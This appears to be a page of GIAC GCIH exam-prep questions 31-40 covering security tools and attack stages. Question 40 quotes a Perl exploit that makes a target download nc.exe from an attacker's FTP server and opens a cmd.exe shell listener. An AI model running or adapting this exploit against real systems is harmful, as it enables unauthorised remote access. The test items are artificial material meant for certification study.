Pass the GIAC Security Administration GCIH Questions and answers with CertsForce

Viewing page 4 out of 10 pages
Viewing questions 31-40 out of questions
Questions # 31:

John works as a Network Security Professional. He is assigned a project to test the security of

www.we-are-secure.com. He establishes a connection to a target host running a Web service with netcat and sends a bad html request in order to retrieve information about the service on the host.

Question # 31

Which of the following attacks is John using?

Options:

A.

Sniffing


B.

Eavesdropping


C.

War driving


D.

Banner grabbing


Expert Solution
Questions # 32:

John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

Options:

A.

Maintaining access


B.

Covering tracks


C.

Gaining access


D.

Reconnaissance


Expert Solution
Questions # 33:

Which of the following tools can be used for network sniffing as well as for intercepting conversations through session hijacking?

Options:

A.

Ethercap


B.

Tripwire


C.

IPChains


D.

Hunt


Expert Solution
Questions # 34:

Fill in the blank with the appropriate word.

StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use ______ defense against buffer overflow attacks.


Expert Solution
Questions # 35:

You run the following command while using Nikto Web scanner:

perl nikto.pl -h 192.168.0.1 -p 443

What action do you want to perform?

Options:

A.

Using it as a proxy server


B.

Updating Nikto


C.

Seting Nikto for network sniffing


D.

Port scanning


Expert Solution
Questions # 36:

Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?

Options:

A.

Whishker


B.

Nessus


C.

SARA


D.

Nmap


Expert Solution
Questions # 37:

Which of the following is the best method of accurately identifying the services running on a victim host?

Options:

A.

Use of the manual method of telnet to each of the open ports.


B.

Use of a port scanner to scan each port to confirm the services running.


C.

Use of hit and trial method to guess the services and ports of the victim host.


D.

Use of a vulnerability scanner to try to probe each port to verify which service is running.


Expert Solution
Questions # 38:

Adam works as a Network Administrator for PassGuide Inc. He wants to prevent the network from DOS attacks. Which of the following is most useful against DOS attacks?

Options:

A.

SPI


B.

Distributive firewall


C.

Honey Pot


D.

Internet bot


Expert Solution
Questions # 39:

Which of the following statements are true about tcp wrappers?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

tcp wrapper provides access control, host address spoofing, client username lookups, etc.


B.

When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.


C.

tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.


D.

tcp wrapper protects a Linux server from IP address spoofing.


Expert Solution
Questions # 40:

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system


B.

Creates an FTP server with write permissions enabled


C.

Opens up a SMTP server that requires no username or password


D.

Opens up a telnet listener that requires no username or password


Expert Solution
Viewing page 4 out of 10 pages
Viewing questions 31-40 out of questions